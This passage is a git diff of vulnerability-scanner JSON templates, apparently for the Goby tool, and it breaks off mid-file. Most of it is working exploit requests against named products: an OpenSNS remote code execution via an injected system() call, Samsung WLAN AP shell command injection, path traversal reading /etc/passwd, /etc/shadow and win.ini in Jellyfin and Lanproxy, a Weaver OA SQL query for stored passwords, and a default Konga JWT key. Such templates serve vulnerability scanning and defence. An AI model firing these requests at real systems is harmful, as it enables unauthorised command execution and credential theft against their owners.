"https://www.pwnwiki.org/index.php?title=IceWarp_WebClient_basic_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E" + ], + "HasExp": true, + "ExpParams": [ + { + "Name": "cmd", + "Type": "input", + "Value": "ipconfig" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -50,7 +55,7 @@ "SetVariable": [] } ], - "ExploitSteps": [ + "ExploitSteps": [ "AND", { "Request": { @@ -77,10 +82,10 @@ ] }, "SetVariable": [ - "output|lastbody" - ] + "output|lastbody|undefined|undefined" + ] } ], - "PostTime": "2021-06-19 13:19:47", - "GobyVersion": "1.8.268" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Jellyfin_10.7.0_Unauthenticated_Abritrary_File_Read_CVE_2021_21402.json b/json/Jellyfin_10.7.0_Unauthenticated_Abritrary_File_Read_CVE_2021_21402.json index bd7b941..770e348 100644 --- a/json/Jellyfin_10.7.0_Unauthenticated_Abritrary_File_Read_CVE_2021_21402.json +++ b/json/Jellyfin_10.7.0_Unauthenticated_Abritrary_File_Read_CVE_2021_21402.json @@ -1,28 +1,17 @@ { "Name": "Jellyfin 10.7.0 Unauthenticated Abritrary File Read CVE-2021-21402", "Level": "2", - "Tags": [ - "Disclosure of Sensitive Information" - ], - "GobyQuery": "(title='Jellyfin')", - "Description": "Jellyfin is a Free Software Media System. In Jellyfin before version 10.7.1, with certain endpoints, well crafted requests will allow arbitrary file read from a Jellyfin server's file system. This issue is more prevalent when Windows is used as the host OS. Servers that are exposed to the public Internet are potentially at risk. This is fixed in version 10.7.1. As a workaround, users may be able to restrict some access by enforcing strict security permissions on their filesystem, however, it is recommended to update as soon as possible.", - "Product": "Jellyfin", - "Homepage": "https://jellyfin.org/", - "Author": "PeiQi", - "Impact": "

Attackers can read arbitrary files to obtain sensitive information of the server

", + "Tags": [], + "GobyQuery": "title=\"Jellyfin\"", + "Description": "", + "Product": "", + "Homepage": "https://gobies.org/", + "Author": "gobysec@gmail.com", + "Impact": "", "Recommandation": "

undefined

", "References": [ - "http://wiki.peiqi.tech" + "https://gobies.org/" ], - "HasExp": true, - "ExpParams": [ - { - "name": "File", - "type": "select", - "value": "windows/win.ini", - "show": "" - } - ], "ScanSteps": [ "OR", { @@ -53,20 +42,6 @@ "operation": "contains", "value": "font", "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "file", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "extension", - "bz": "" } ] }, @@ -100,59 +75,12 @@ "operation": "contains", "value": "font", "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "extension", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "file", - "bz": "" } ] }, "SetVariable": [] } ], - "ExploitSteps": [ - "OR", - { - "Request": { - "method": "GET", - "uri": "/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/", - "follow_redirect": false, - "header": { - "Content-Type": "application/octet-stream" - }, - "data_type": "text", - "data": "" - }, - "SetVariable": [ - "output|lastbody" - ] - }, - { - "Request": { - "method": "GET", - "uri": "/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/", - "follow_redirect": false, - "header": { - "Content-Type": "application/octet-stream" - }, - "data_type": "text", - "data": "" - }, - "SetVariable": [ - "output|lastbody" - ] - } - ], - "PostTime": "2021-04-07 21:05:13", + "PostTime": "2021-04-07 15:10:20", "GobyVersion": "1.8.255" } \ No newline at end of file diff --git a/json/Jitong_EWEBS_phpinfo_leak.json b/json/Jitong_EWEBS_phpinfo_leak.json index 5f1d567..9b579f8 100644 --- a/json/Jitong_EWEBS_phpinfo_leak.json +++ b/json/Jitong_EWEBS_phpinfo_leak.json @@ -1,17 +1,23 @@ { - "Name": "极通EWEBSphpinfo泄露", - "Level": "3", - "Tags": [], + "Name": "Jitong EWEBS phpinfo leak", + "Level": "0", + "Tags": [ + "infoleak" + ], "GobyQuery": "body=\"极通软件\"", "Description": "", - "Product": "", - "Homepage": "https://gobies.org/", - "Author": "gobysec@gmail.com", - "Impact": "", - "Recommandation": "", - "References": [ - "https://gobies.org/" - ], + "Product": "Jitong EWEBS", + "Homepage": "http://www.n-soft.com.cn/", + "Author": "", + "Impact": "Jitong EWEBS phpinfo leak", + "Recommendation": "", + "References": [], + "HasExp": true, + "ExpParams": null, + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -19,7 +25,7 @@ "method": "GET", "uri": "/testweb.php", "follow_redirect": false, - "header": {}, + "header": null, "data_type": "text", "data": "" }, @@ -39,6 +45,34 @@ "SetVariable": [] } ], - "PostTime": "2021-06-17 21:19:12", - "GobyVersion": "1.8.268" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/testweb.php", + "follow_redirect": false, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "PHP Version", + "bz": "" + } + ] + }, + "SetVariable": [] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Konga_Default_JWT_KEY.json b/json/Konga_Default_JWT_KEY.json index b79727c..c5525c9 100644 --- a/json/Konga_Default_JWT_KEY.json +++ b/json/Konga_Default_JWT_KEY.json @@ -4,12 +4,12 @@ "Tags": [ "defaultaccount" ], - "GobyQuery": "(title==\"Konga\" | body=\"window.konga_version\")", - "Description": "Konga JWT默认key为oursecret,可伪造任意用户权限。", + "GobyQuery": "title=\"Konga\" || body=\"window.konga_version\"", + "Description": "Konga offers the tools you need to manage your Kong cluster with ease.", "Product": "Konga", "Homepage": "https://github.com/pantsel/konga", - "Author": "aetkrad", - "Impact": "", + "Author": "", + "Impact": "The default key of Konga JWT is oursecret, which can forge arbitrary user permissions.", "Recommendation": "", "References": [ "https://mp.weixin.qq.com/s/8guU2hT3wE2puEztdGqZQg" @@ -112,6 +112,6 @@ ] } ], - "PostTime": "2021-12-03 18:50:39", - "GobyVersion": "1.9.310" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Lanproxy_Directory_traversal_CVE_2021_3019.json b/json/Lanproxy_Directory_traversal_CVE_2021_3019.json index 66130fd..8f5fab1 100644 --- a/json/Lanproxy_Directory_traversal_CVE_2021_3019.json +++ b/json/Lanproxy_Directory_traversal_CVE_2021_3019.json @@ -1,36 +1,44 @@ { - "Name": "Lanproxy目录遍历 CVE-2021-3019", + "Name": "Lanproxy Directory Traversal CVE-2021-3019", "Level": "2", - "Tags": [], - "GobyQuery": "header= \"Server: LPS-0.1\"", - "Description": "lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,目前仅支持tcp流量转发,可支持任何tcp上层协议(ssh访问、web服务器访问、远程桌面...)。", - "Product": "", - "Homepage": "https://gobies.org/", - "Author": "luckying", - "Impact": "", - "Recommandation": "", - "References": [ - "https://gobies.org/" + "Tags": [ + "Directory Traversal" ], - "HasExp": true, - "ExpParams": [ - { - "name": "path", - "type": "input", - "value": "/../conf/config.properties", - "show": "" - } - ], + "GobyQuery": "header=\"Server: LPS-0.1\"", + "Description": "Lanproxy is a reverse proxy to help you expose a local server behind a NAT or firewall to the internet. it supports any protocols over tcp (http https ssh ...)", + "Product": "ffay lanproxy 0.1", + "Homepage": "https://github.com/ffay/lanproxy", + "Author": "", + "Impact": "ffay lanproxy 0.1 allows Directory Traversal to read /../conf/config.properties to obtain credentials for a connection to the intranet.", + "Recommendation": "", + "References": [ + "https://github.com/ffay/lanproxy/commits/master", + "https://github.com/maybe-why-not/lanproxy/issues/1", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3019" + ], + "HasExp": true, + "ExpParams": [ + { + "Name": "Filename", + "Type": "select", + "Value": "/../../../../../../../../../../etc/passwd,/../conf/config.properties,/../../../../../../../../../../etc/shadow" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/../conf/config.properties", - "follow_redirect": false, - "header": {}, + "follow_redirect": true, + "header": null, "data_type": "text", - "data": "" + "data": "", + "set_variable": [] }, "ResponseTest": { "type": "group", @@ -47,34 +55,7 @@ "type": "item", "variable": "$body", "operation": "contains", - "value": "config.admin", - "bz": "" - } - ] - }, - "SetVariable": [] - } - ], - "ExploitSteps": [ - "AND", - { - "Request": { - "method": "GET", - "uri": "{{{path}}}", - "follow_redirect": false, - "header": {}, - "data_type": "text", - "data": "" - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", + "value": "server.ssl", "bz": "" }, { @@ -87,10 +68,40 @@ ] }, "SetVariable": [ - "output|lastbody" - ] + "output|lastbody|regex|" + ] } ], - "PostTime": "2021-06-24 17:23:13", - "GobyVersion": "1.8.268" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "{{{Filename}}}", + "follow_redirect": true, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/OpenSNS_RCE.json b/json/OpenSNS_RCE.json index 75c0137..dd60778 100644 --- a/json/OpenSNS_RCE.json +++ b/json/OpenSNS_RCE.json @@ -1,28 +1,32 @@ { - "Name": "OpenSNS 远程代码执行漏洞", + "Name": "OpenSNS RCE", "Level": "3", "Tags": [ "RCE" ], "GobyQuery": "body=\"opensns\"", - "Description": "OpenSNS是想天科技开发的一款综合性社交软件,存在命令执行漏洞且是administrator", + "Description": "OpenSNS is a comprehensive social software developed by Xiangtian Technology.", "Product": "OpenSNS", "Homepage": "http://www.opensns.cn/", - "Author": "luckying", - "Impact": "", - "Recommandation": "", + "Author": "", + "Impact": "A vulnerability in OpenSNS allows remote unauthenticated attackers to cause the product to execute arbitrary code via the 'shareBox' endpoint.", + "Recommendation": "", "References": [ - "https://www.pwnwiki.org/index.php?title=OpenSNS_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/zh-cn" + "http://www.0dayhack.net/index.php/2417/", + "https://www.pwnwiki.org/index.php?title=OpenSNS_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E" ], - "HasExp": true, - "ExpParams": [ - { - "name": "Cmd", - "type": "input", - "value": "whoami", - "show": "" - } - ], + "HasExp": true, + "ExpParams": [ + { + "Name": "Cmd", + "Type": "input", + "Value": "whoami" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -30,7 +34,7 @@ "method": "GET", "uri": "/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ipconfig)", "follow_redirect": false, - "header": {}, + "header": null, "data_type": "text", "data": "" }, @@ -50,14 +54,14 @@ "SetVariable": [] } ], - "ExploitSteps": [ + "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system({{{Cmd}}})", "follow_redirect": false, - "header": {}, + "header": null, "data_type": "text", "data": "" }, @@ -75,10 +79,10 @@ ] }, "SetVariable": [ - "output|lastbody" - ] + "output|lastbody|undefined|undefined" + ] } ], - "PostTime": "2021-06-28 11:44:33", - "GobyVersion": "1.8.268" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/RuoYi_Druid_Unauthorized_access.json b/json/RuoYi_Druid_Unauthorized_access.json index 0e00144..4c5fc4d 100644 --- a/json/RuoYi_Druid_Unauthorized_access.json +++ b/json/RuoYi_Druid_Unauthorized_access.json @@ -2,18 +2,22 @@ "Name": "RuoYi Druid Unauthorized access", "Level": "0", "Tags": [ - "Disclosure of Sensitive Information" + "infoleak" ], "GobyQuery": "app=\"ruoyi-System\"", - "Description": "If Druid is used in the management system, anonymous access is enabled by default, resulting in unauthorized access to sensitive information", + "Description": "RuoYi", "Product": "RuoYi", "Homepage": "https://gitee.com/y_project/RuoYi-Vue", - "Author": "PeiQi", - "Impact": "

 resulting in unauthorized access to sensitive information

", - "Recommandation": "", - "References": [ - "http://wiki.peiqi.tech" - ], + "Author": "", + "Impact": "If Druid is used in the management system, anonymous access is enabled by default, resulting in unauthorized access to sensitive information.", + "Recommendation": "", + "References": [], + "HasExp": true, + "ExpParams": null, + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -21,7 +25,7 @@ "method": "GET", "uri": "/prod-api/druid/index.html", "follow_redirect": false, - "header": {}, + "header": null, "data_type": "text", "data": "" }, @@ -55,6 +59,43 @@ "SetVariable": [] } ], - "PostTime": "2021-04-20 23:13:54", - "GobyVersion": "1.8.258" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Samsung_WLAN_AP_WEA453e_RCE.json b/json/Samsung_WLAN_AP_WEA453e_RCE.json index 60e097a..4b97f96 100644 --- a/json/Samsung_WLAN_AP_WEA453e_RCE.json +++ b/json/Samsung_WLAN_AP_WEA453e_RCE.json @@ -1,30 +1,42 @@ { "Name": "Samsung WLAN AP WEA453e RCE", "Level": "3", - "Tags": [], - "GobyQuery": "title==\"Samsung WLAN AP\"", - "Description": "三星 WLAN AP WEA453e路由器 存在远程命令执行漏洞,可在未授权的情况下执行任意命令获取服务器权限", - "Product": "三星 WLAN AP WEA453e路由器", - "Homepage": "https://www.samsung.com/", - "Author": "lxy@secbug.org", - "Impact": "

暂无

", - "Recommandation": "

暂无

", - "References": [ - "Internet" + "Tags": [ + "rce" ], + "GobyQuery": "title=\"Samsung WLAN AP\" || app=\"Chunjs-server\" && body=\"Samsung Electronics\"", + "Description": "Samsung WLAN AP WEA453e", + "Product": "Samsung WLAN AP WEA453e", + "Homepage": "https://www.samsung.com/", + "Author": "", + "Impact": "Samsung WLAN AP wea453e router has a remote command execution vulnerability.", + "Recommendation": "", + "References": [], + "HasExp": true, + "ExpParams": [ + { + "Name": "Cmd", + "Type": "input", + "Value": "cat /etc/passwd" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { "Request": { - "method": "POST", + "method": "GET", "uri": "/(download)/tmp/a.txt", - "follow_redirect": true, + "follow_redirect": false, "header": { - "Connection": "close", - "Content-Length": "48" + "Content-Type": "application/json;charset=UTF-8" }, "data_type": "text", - "data": "command1=shell:cat /etc/passwd| dd of=/tmp/a.txt" + "data": "command1=shell:cat /etc/passwd| dd of=/tmp/a.txt", + "set_variable": [] }, "ResponseTest": { "type": "group", @@ -46,9 +58,43 @@ } ] }, - "SetVariable": [] + "SetVariable": [ + "output|lastbody|regex|" + ] } ], - "PostTime": "2021-04-01 11:47:39", - "GobyVersion": "1.8.237" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/(download)/tmp/a.txt", + "follow_redirect": false, + "header": { + "Content-Type": "application/json;charset=UTF-8" + }, + "data_type": "text", + "data": "command1=shell:{{{Cmd}}}| dd of=/tmp/a.txt", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Samsung_WLAN_AP_wea453e_router_RCE.json b/json/Samsung_WLAN_AP_wea453e_router_RCE.json index fac7a7d..fcab6f2 100644 --- a/json/Samsung_WLAN_AP_wea453e_router_RCE.json +++ b/json/Samsung_WLAN_AP_wea453e_router_RCE.json @@ -1,82 +1,175 @@ { - "Name": "Samsung WLAN AP wea453e router RCE", - "Level": "3", - "Tags": [ - "RCE" - ], - "GobyQuery": "app=\"Chunjs-server\" && body=\"Samsung Electronics\"", - "Description": "Samsung WLAN AP wea453e router has a remote command execution vulnerability. It can execute arbitrary commands without authorization to obtain server permissions", - "Product": "Samsung WLAN AP wea453e router", - "Homepage": "https://www.samsung.com/cn/", - "Author": "PeiQi", - "Impact": "

Execute any command to get the server permission

", - "Recommandation": "", - "References": [ - "http://wiki.peiqi.tech" - ], - "HasExp": true, - "ExpParams": [ - { - "name": "Cmd", - "type": "input", - "value": "cat /etc/passwd", - "show": "" - } - ], - "ScanSteps": [ - "AND", - { - "Request": { - "method": "POST", - "uri": "/(download)/tmp/a.txt", - "follow_redirect": false, - "header": { - "Content-Type": "application/json;charset=UTF-8" - }, - "data_type": "text", - "data": "command1=shell:cat /etc/passwd| dd of=/tmp/a.txt" - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "root", - "bz": "" - } - ] - }, - "SetVariable": [] - } - ], - "ExploitSteps": [ - "AND", - { - "Request": { - "method": "POST", - "uri": "/(download)/tmp/a.txt", - "follow_redirect": false, - "header": { - "Content-Type": "application/json;charset=UTF-8" - }, - "data_type": "text", - "data": "command1=shell:{{{Cmd}}}| dd of=/tmp/a.txt" - }, - "SetVariable": [ - "output|lastbody" - ] - } - ], - "PostTime": "2021-04-04 23:47:22", - "GobyVersion": "1.8.255" + +​ "Name": "Samsung WLAN AP wea453e router RCE", + +​ "Level": "3", + +​ "Tags": [ + +​ "rce", + +​ "getshell" + +​ ], + +​ "GobyQuery": "app=\"Chunjs-server\" && body=\"Samsung Electronics\"", + +​ "Description": "xxxx", + +​ "Product": "xxxxxx", + +​ "Homepage": "https://gobies.org/", + +​ "Author": "gobysec@gmail.com", + +​ "Impact": "

xxxx

", + +​ "Recommendation": "

xxxxx

", + +​ "References": [ + +​ "https://gobies.org/" + +​ ], + +​ "HasExp": true, + +​ "ExpParams": [{ + +​ "Name": "cmd", + +​ "Type": "input", + +​ "Value": "ls" + +​ }], + +​ "ExpTips": { + +​ "Type": "", + +​ "Content": "" + +​ }, + +​ "ScanSteps": [ + +​ "AND", + +​ { + +​ "Request": { + +​ "method": "POST", + +​ "uri": "/(download)/tmp/a.txt", + +​ "follow_redirect": true, + +​ "header": null, + +​ "data_type": "text", + +​ "data": "command1=shell:ifconfig| dd of=/tmp/a.txt", + +​ "set_variable": [] + +​ }, + +​ "ResponseTest": { + +​ "type": "group", + +​ "operation": "AND", + +​ "checks": [{ + +​ "type": "item", + +​ "variable": "$code", + +​ "operation": "==", + +​ "value": "200", + +​ "bz": "" + +​ }, + +​ { + +​ "type": "item", + +​ "variable": "$body", + +​ "operation": "contains", + +​ "value": "eth0", + +​ "bz": "" + +​ } + +​ ] + +​ }, + +​ "SetVariable": [ + +​ "output|lastbody|regex|" + +​ ] + +​ } + +​ ], + +​ "ExploitSteps": [ + +​ "AND", + +​ { + +​ "Request": { + +​ "method": "POST", + +​ "uri": "/(download)/tmp/a.txt", + +​ "follow_redirect": true, + +​ "header": null, + +​ "data_type": "text", + +​ "data": "command1=shell:{{{cmd}}} | dd of=/tmp/a.txt", + +​ "set_variable": [] + +​ }, + +​ "ResponseTest": { + +​ "type": "group", + +​ "operation": "AND", + +​ "checks": [] + +​ }, + +​ "SetVariable": [ + +​ "output|lastbody||" + +​ ] + +​ } + +​ ], + +​ "PostTime": "2021-11-26 19:12:54", + +​ "GobyVersion": "1.9.310" + } \ No newline at end of file diff --git a/json/Security_Devices_Hardcoded_Password.json b/json/Security_Devices_Hardcoded_Password.json index f50e512..49a522c 100644 --- a/json/Security_Devices_Hardcoded_Password.json +++ b/json/Security_Devices_Hardcoded_Password.json @@ -5,11 +5,11 @@ "infoleak" ], "GobyQuery": "body=\"var dkey_verify = Get_Verify_Info(hex_md5)\"", - "Description": "中科网威、网域科技、锐捷、天工网络等防火墙web管理程序存在硬编码漏洞。", - "Product": "多个", - "Homepage": "无", - "Author": "aetkrad", - "Impact": "", + "Description": "", + "Product": "", + "Homepage": "", + "Author": "", + "Impact": "There are hard-coded vulnerabilities in firewall web management programs such as Zhongke Wangwei, Wangyu Technology, Ruijie, and Tiangong Network.", "Recommendation": "", "References": [ "https://mp.weixin.qq.com/s/59-rkZUWZNtJVgIbpULnxw" @@ -94,6 +94,6 @@ ] } ], - "PostTime": "2021-12-06 16:14:12", - "GobyVersion": "1.9.310" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/SonarQube_unauth_CVE_2020_27986.json b/json/SonarQube_unauth_CVE_2020_27986.json index 53cfdc9..e736b52 100644 --- a/json/SonarQube_unauth_CVE_2020_27986.json +++ b/json/SonarQube_unauth_CVE_2020_27986.json @@ -4,7 +4,7 @@ "Tags": [ "unauth" ], - "GobyQuery": "app=\"SonarQube-code management\"", + "GobyQuery": "app=\"SonarQube\"", "Description": "SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SVN, and GitLab credentials via the api/settings/values URI.", "Product": "SonarQube", "Homepage": "https://www.sonarqube.org/", @@ -14,7 +14,7 @@ "References": [ "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27986" ], - "HasExp": true, + "HasExp": false, "ExpParams": null, "ExpTips": { "Type": "", @@ -64,50 +64,6 @@ ] } ], - "ExploitSteps": [ - "AND", - { - "Request": { - "method": "GET", - "uri": "/api/settings/values", - "follow_redirect": true, - "header": null, - "data_type": "text", - "data": "", - "set_variable": [] - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "sonaranalyzer-cs.nuget.packageVersion", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "sonar.core.id", - "bz": "" - } - ] - }, - "SetVariable": [ - "output|lastbody|regex|" - ] - } - ], - "PostTime": "2022-06-25 20:10:24", - "GobyVersion": "1.9.323" + "PostTime": "2021-11-29 15:03:58", + "GobyVersion": "1.9.310" } \ No newline at end of file diff --git a/json/VMWare_Operations_vRealize_Operations_Manager_API_SSRF_CVE_2021_21975.json b/json/VMWare_Operations_vRealize_Operations_Manager_API_SSRF_CVE_2021_21975.json index ac72523..6ae21fe 100644 --- a/json/VMWare_Operations_vRealize_Operations_Manager_API_SSRF_CVE_2021_21975.json +++ b/json/VMWare_Operations_vRealize_Operations_Manager_API_SSRF_CVE_2021_21975.json @@ -4,16 +4,23 @@ "Tags": [ "SSRF" ], - "GobyQuery": "app=\"Apache-Web-Server\" && title==\"vRealize Operations Manager\"", - "Description": "malicious attackers who access the vrealize Operations Manager API through the network can perform server-side request forgery attack to steal management credentials.", + "GobyQuery": "app=\"Apache-Web-Server\" && title=\"vRealize Operations Manager\"", + "Description": "vRealize Operations Enable self-driving IT Operations Management across private, hybrid and multi-cloud environments with a unified operations platform that delivers continuous performance, capacity and cost optimization, intelligent remediation and integrated compliance through AI/ML and predictive analytics.", "Product": "VMWare Operations vRealize Operations", - "Homepage": "https://www.vmware.com/cn/products/vrealize-operations.html", - "Author": "PeiQi", - "Impact": "

 can perform server-side request forgery attack to steal management credentials.

", - "Recommandation": "

undefined

", + "Homepage": "https://www.vmware.com/products/vrealize-operations.html", + "Author": "", + "Impact": "Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials.", + "Recommendation": "", "References": [ - "http://wiki.peiqi.tech" + "https://nvd.nist.gov/vuln/detail/CVE-2021-21975", + "https://www.vmware.com/security/advisories/VMSA-2021-0004.html" ], + "HasExp": true, + "ExpParams": null, + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -64,7 +71,7 @@ "SetVariable": [] } ], - "ExploitSteps": [ + "ExploitSteps": [ "AND", { "Request": { @@ -111,11 +118,9 @@ } ] }, - "SetVariable": [ - "output|lastbody" - ] + "SetVariable": [] } ], - "PostTime": "2021-04-07 23:45:28", - "GobyVersion": "1.8.255" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/VMware_vCenter_v7.0.2_Arbitrary_File_Read.json b/json/VMware_vCenter_v7.0.2_Arbitrary_File_Read.json index 670e4b2..d106efe 100644 --- a/json/VMware_vCenter_v7.0.2_Arbitrary_File_Read.json +++ b/json/VMware_vCenter_v7.0.2_Arbitrary_File_Read.json @@ -8,7 +8,7 @@ "Description": "VMware vCenter Server is advanced server management software that provides a centralized platform for controlling your VMware vSphere environments, allowing you to automate and deliver a virtual infrastructure across the hybrid cloud with confidence.", "Product": "VMware-vCenter", "Homepage": "https://www.vmware.com/products/vcenter-server.html", - "Author": "aetkrad", + "Author": "", "Impact": "", "Recommendation": "", "References": [ @@ -100,6 +100,6 @@ ] } ], - "PostTime": "2021-12-02 18:50:55", - "GobyVersion": "1.9.310" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Weaver_OA_8_SQL_injection.json b/json/Weaver_OA_8_SQL_injection.json index b523bde..e59fe29 100644 --- a/json/Weaver_OA_8_SQL_injection.json +++ b/json/Weaver_OA_8_SQL_injection.json @@ -5,15 +5,19 @@ "SQL Injection" ], "GobyQuery": "app=\"Weaver-OA\"", - "Description": "There is a SQL injection vulnerability in Pan micro OA V8, through which an attacker can obtain administrator and server privileges", + "Description": "", "Product": "Weaver OA 8", - "Homepage": "https://www.weaver.com.cn/", - "Author": "PeiQi", - "Impact": "", - "Recommandation": "

undefined

", - "References": [ - "http://wiki.peiqi.tech" - ], + "Homepage": "https://weaver.com/", + "Author": "", + "Impact": "There is a SQL injection vulnerability in Pan micro OA V8, through which an attacker can obtain administrator and server privileges.", + "Recommendation": "", + "References": [], + "HasExp": false, + "ExpParams": null, + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -21,7 +25,7 @@ "method": "GET", "uri": "/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager", "follow_redirect": false, - "header": {}, + "header": null, "data_type": "text", "data": "" }, @@ -47,7 +51,7 @@ "type": "item", "variable": "$body", "operation": "not contains", - "value": "", + "value": "<html>", "bz": "" }, { @@ -62,6 +66,6 @@ "SetVariable": [] } ], - "PostTime": "2021-04-10 08:00:20", - "GobyVersion": "1.8.255" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/YAPI_RCE.json b/json/YAPI_RCE.json index b796f28..f72040a 100644 --- a/json/YAPI_RCE.json +++ b/json/YAPI_RCE.json @@ -4,17 +4,20 @@ "Tags": [ "rce" ], - "GobyQuery": "(app=\"YAPI\" | title==\"YApi-高效、易用、功能强大的可视化接口管理平台\" | title==\"YApi Pro-高效、易用、功能强大的可视化接口管理平台\")", - "Description": "YAPI是由去哪儿网移动架构组(简称YMFE,一群由FE、iOS和Android工程师共同组成的最具想象力、创造力和影响力的大前端团队)开发的可视化接口管理工具,是一个可本地部署的、打通前后端及QA的接口管理平台。YAPI发布在公网且开发注册,会导致攻击者注册后执行任意命令。", + "GobyQuery": "app=\"YAPI\" || title==\"YApi-高效、易用、功能强大的可视化接口管理平台\" || title==\"YApi Pro-高效、易用、功能强大的可视化接口管理平台\"", + "Description": "YApi is an efficient, easy-to-use and powerful visual interface management platform.", "Product": "YAPI", "Homepage": "https://github.com/YMFE/yapi", - "Author": "aetkrad", - "Impact": "", + "Author": "", + "Impact": "A vulnerability in Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code.", "Recommendation": "", "References": [ + "https://www.secpulse.com/archives/162502.html", + "https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b", + "https://twitter.com/sec715/status/1415484190561161216", "https://mp.weixin.qq.com/s/zobag3-fIl_0vrc8BrnRjg" ], - "HasExp": false, + "HasExp": true, "ExpParams": null, "ExpTips": { "Type": "", @@ -64,6 +67,43 @@ ] } ], - "PostTime": "2021-12-01 20:34:40", - "GobyVersion": "1.9.310" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", 